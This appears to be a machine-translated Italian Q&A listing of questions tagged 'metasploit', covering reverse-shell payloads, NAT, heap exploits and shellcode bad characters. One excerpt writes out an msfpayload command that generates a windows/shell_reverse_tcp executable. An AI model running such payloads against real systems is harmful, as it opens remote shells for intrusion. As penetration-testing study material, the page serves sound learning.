Domande con tag 'metasploit'

1
risposta

Problema di dipendenza dell'architettura associato a payload dannosi

La mia domanda riguarda le restrizioni architettoniche associate ai payload backdoor / bind / reverse tcp utilizzati in genere per ottenere shell attraverso lo sfruttamento. In una situazione in cui l'architettura del box di destinazione (x86...
posta 11.02.2015 - 17:05
2
risposte

Metasploit Ottieni shell tramite NAT

Ok, prima di tutto questo è legale e ho scritto per iscritto che il mio amico e io ci stiamo attaccando per migliorare e non infrangere la legge. Impostazioni Ho un'immagine VMWare che esegue BT5R3. Utilizza il NAT di VMWare, quindi la mia...
posta 16.07.2013 - 14:54
2
risposte

Buon esempio di exploit di heap su Linux

Sto facendo una dimostrazione di attacchi di corruzione della memoria e vorrei mostrare alcuni esempi funzionanti di exploit che presentano problemi di heap (come use-after-free). I miei requisiti sono: Un exploit funzionante (remoto o local...
posta 20.12.2016 - 08:52
1
risposta

Metasploit reverse_http (s) PAYLOAD per target linux

Durante lo sfruttamento tramite browzer_autopwn di metasploit, ho bisogno di impostare un payload usando il canale http o https su un target linux. Ma non ci sono reverse_http (s) disponibili nella categoria del payload linux. Che cosa posso...
posta 23.06.2015 - 12:56
4
risposte

windows / shell_reverse_tcp exploit non funziona se listener non è già in esecuzione

Sto usando Metasploit per generare un exploit shell_reverse_tcp usando il seguente comando: msfpayload windows/shell_reverse_tcp LHOST=192.168.1.171 x > exploit.exe Sul lato listener sto usando netcat. Tutto è perfetto e se eseguo pri...
posta 23.02.2016 - 11:10
1
risposta

Custom EXE Template Metasploit 64-bit ASM PE Sintassi

L'ho chiesto in precedenza e poi eliminato poiché penso di aver posto la domanda senza orientarla verso msfvenom e modelli EXE personalizzati. Esiste un PE di Windows a 64 bit scritto in assembly fornito con Metasploit che sto cercando di com...
posta 17.01.2018 - 05:05
2
risposte

C'è qualche svantaggio nel dichiarare sempre alcuni caratteri errati di default durante la generazione di exploit?

Quando si impostano i caratteri errati per il codice shell, c'è qualche svantaggio se si presume che si debba contrassegnare \ x00 e \ x0a come male?     
posta 31.01.2016 - 09:28
3
risposte

Possiamo hackerare con il nostro computer

Recentemente ho acquisito interesse per Kali, in particolare framework come Metasploit. Supponiamo di avere solo un computer che non ha accesso a Internet. Voglio imparare come usare strumenti e framework in Kali come Metasploit. Ho trovato molt...
posta 18.03.2017 - 15:04
4
risposte

Automatizzare gli attacchi Metasploit, è possibile generare tutti (più) moduli?

Lavoro sulla creazione di firme per tutti i moduli metasploit. Devo stimolare praticamente tutti gli attacchi (exploit) in metasploit senza effettivamente bersagliare una vera vittima (non credo che l'autopwn possa aiutare qui). La maggior pa...
posta 20.05.2012 - 10:23
2
risposte

Come vengono eseguiti i payload arbitrari sulla macchina remota?

Capisco di eseguire qualcosa come un reverse TCP bind tramite shell si basa sulle risorse disponibili sulla macchina vittima ... e nel caso di esecuzione di uno script, dovremmo dire, Ruby dalla riga di comando verrà interpretato fino a codice m...
posta 10.12.2013 - 00:58